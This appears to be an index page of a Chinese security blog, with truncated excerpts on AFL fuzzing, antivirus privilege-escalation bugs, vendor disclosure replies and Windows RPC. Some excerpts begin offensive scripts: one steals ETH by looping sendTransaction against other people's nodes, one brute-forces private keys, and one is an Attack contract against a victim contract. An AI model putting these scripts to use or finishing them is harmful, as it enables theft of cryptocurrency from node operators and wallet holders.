http://rk700.github.io/2018/02/02/afl-enhancement/ AFL改进小试 http://rk700.github.io/2017/12/28/afl-internals/ AFL内部实现细节小记 http://rk700.github.io/2018/01/04/afl-mutations/ AFL文件变异一览  

3个BUG…  

杀软逆一波… AVAST产品 版本 Avast Free Antivirus 18.6.2349(build 18.6.3983.0) Avast Premier Antivirus 18.6.2349(build 18.6.3983.371) 三、漏洞原因 通过4个不同的漏洞组合利用可以实现提权。 ~~ 巴拉巴拉

https://github.com/ZhiyuanWang-Chengdu-Qihoo360/AdobeReader_POC Hello, Thank you for reporting security issues defined below [0]. We are planning to release security update next month for Adobe Acroba […]

IBM的RPC 编程 够详细 https://www.ibm.com/developerworks/cn/aix/library/au-rpc_programming/   个人博客 Windows RPC Demo实现 https://www.cnblogs.com/wanghaiyang1930/p/4469222.html   RPC漏洞 Windows全版本提权之Win […]

文章来源：https://docs.microsoft.com/en-us/windows/desktop/procthread/changing-environment-variables Changing Environment Variables 05/31/2018 3 minutes to read Each process has an environment block associ […]

大概那些盗币原理也就这样吧~ 循环发送sendTransaction 命令导致对方服务器ETH余额被盗。 守株待兔一个亿不是梦。 #coding:utf-8 import time from web3 import Web3, HTTPProvider import multiprocessing import socket import socks socket.setdefaulttimeou […]

学了段时间ETH安全写的私钥碰撞程序 效果有些慢，反正我还没碰撞到。 python不适合，太卡了 #coding:utf-8 import time from web3 import Web3, HTTPProvider from ecdsa import SigningKey, SECP256k1 import sha3 import socks import socket import mul […]

contract Attack{ address owner; address victim; modifier ownerOnly { require(owner == msg.sender); _; } function Attack() payable{ owner = msg.sender; } // 设置已部署的 IDMoney 合约实例地址 function setvictim(add […]

from ecdsa import SigningKey, SECP256k1 import sha3 keccak = sha3.keccak_256() priv = SigningKey.generate(curve=SECP256k1) pub = priv.get_verifying_key().to_string() keccak.update(pub) address = kecca […]

文章来源：https://www.syscan.org/slides/2016_SH_Li_Kang_The_Hype_and_Reality_of_AI_in_Vulnerability_Discovery.pdf 人工智能在漏洞发现中的运用之虚与实 Kang Li kangli.ctf@gmail.com 自我介绍 乔治亚大学教授 Disekt、SecDawgs CTF 团队创始人 xCTF […]

www.youtube.com/watch?v=0dqL6vfPCek 需要翻墙

We have published our Security Bulletin for the vulnerability that you’ve reported on Trend Micro Security driver exploit. Please check this out and let us know if you have concerns: https://esupport. […]

CVE-2018-12758  分类 (越界写作)(任意代码执行)(严重)